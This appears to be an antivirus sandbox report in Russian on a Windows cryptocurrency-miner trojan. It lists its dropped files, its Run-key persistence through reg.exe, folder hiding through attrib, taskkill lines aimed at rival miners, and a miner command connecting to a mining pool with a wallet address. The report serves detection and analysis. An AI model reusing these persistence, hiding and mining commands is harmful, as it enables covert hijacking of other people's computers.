Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Driver' = '%WINDIR%\schost.exe'
- %ALLUSERSPROFILE%\Start Menu\Programs\Startup\schost.exe
- '%APPDATA%\Microsoft\sys32\svchost.exe'
- '%APPDATA%\Microsoft\sys32\smcss.exe' -o stratum+tcp://zerofloorparty.com:17100 -u 46PbLu897XtRevHdHbPwuHJT5HiQTHxcNTUP98w58PTvAaqozRRLSs9PDKU1bEthi3hxQX1FknFGvGtpbuQYWd8KLF5V5ee -p x
- '%APPDATA%\Microsoft\sys32\7za.exe' x sys32.7z -pkdjklfjKLJKJJiofuvf8d78fd9b79fdfdjvndfjkvhdsfasicjdsovcijdsovidsjvjosdcjdsod908098ew8 -aoa
- '%WINDIR%\zdriver32.exe'
- '%WINDIR%\system\gzip.exe' -d 7za.exe.gz
- '<SYSTEM32>\find.exe' "5.1"
- '<SYSTEM32>\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v Driver /t REG_SZ /d %WINDIR%\schost.exe /f
- '<SYSTEM32>\taskkill.exe' /f /im gzip.exe
- '<SYSTEM32>\attrib.exe' +S +H %WINDIR%\system
- '<SYSTEM32>\attrib.exe' +S +H %APPDATA%\Microsoft\sys32
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\ztmp\t20916.bat" "%APPDATA%\Microsoft\sys32\svchost.exe" "
- '<SYSTEM32>\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v Driver /t REG_SZ /d %WINDIR%\schost.exe /fsss
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\ztmp\t17864.bat" "%WINDIR%\zdriver32.exe" "
- '<SYSTEM32>\taskkill.exe' /f /im smcss.exe
- '<SYSTEM32>\taskkill.exe' /f /im schost.exe
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\start.bat" "
- '<SYSTEM32>\taskkill.exe' /f /im driver.exe
- '<SYSTEM32>\taskkill.exe' /f /im minerd_qv2.2_sse4.exe
- '<SYSTEM32>\taskkill.exe' /f /im minerd_w32_sse4.exe
- '<SYSTEM32>\taskkill.exe' /f /im zdriver32.exe
- '<SYSTEM32>\taskkill.exe' /f /im minerd.exe
- %APPDATA%\Microsoft\sys32\schost.exe
- %APPDATA%\Microsoft\sys32\smcss.exe
- %APPDATA%\Microsoft\sys32\sys32.7z
- %APPDATA%\Microsoft\sys32\7za.exe
- %APPDATA%\Microsoft\sys32\svchost.exe
- %TEMP%\ztmp\t20965.exe
- %APPDATA%\Microsoft\sys32\1402532006_log.txt
- %WINDIR%\schost.exe
- %TEMP%\ztmp\t20916.bat
- %TEMP%\1.tmp\sys32.7z
- %TEMP%\1.tmp\7za.exe.gz
- %TEMP%\1.tmp\start.bat
- %TEMP%\1.tmp\gzip.exe
- %TEMP%\1.tmp\zdriver32.exe
- %TEMP%\ztmp\t17917.exe
- %WINDIR%\system\7za.exe
- %TEMP%\1.tmp\elevate.exe
- %TEMP%\ztmp\t17864.bat
- %WINDIR%\Web\tip.htm
- %WINDIR%\Web\safemode.htt
- %WINDIR%\system\7za.exe.gz
- %WINDIR%\Web\tips.gif
- %WINDIR%\Web\exclam.gif
- %TEMP%\1.tmp\start.bat
- %TEMP%\1.tmp\elevate.exe
- %WINDIR%\Web\deskmovr.htt
- %WINDIR%\Web\bullet.gif
- %TEMP%\1.tmp\7za.exe.gz в %WINDIR%\system\7za.exe.gz
- %TEMP%\1.tmp\zdriver32.exe в %WINDIR%\zdriver32.exe
- %TEMP%\1.tmp\gzip.exe в %WINDIR%\system\gzip.exe
- %TEMP%\1.tmp\sys32.7z в %WINDIR%\system\sys32.7z
- 'ze####oorparty.com':17100
- DNS ASK ze####oorparty.com
- ClassName: '(null)' WindowName: '(null)'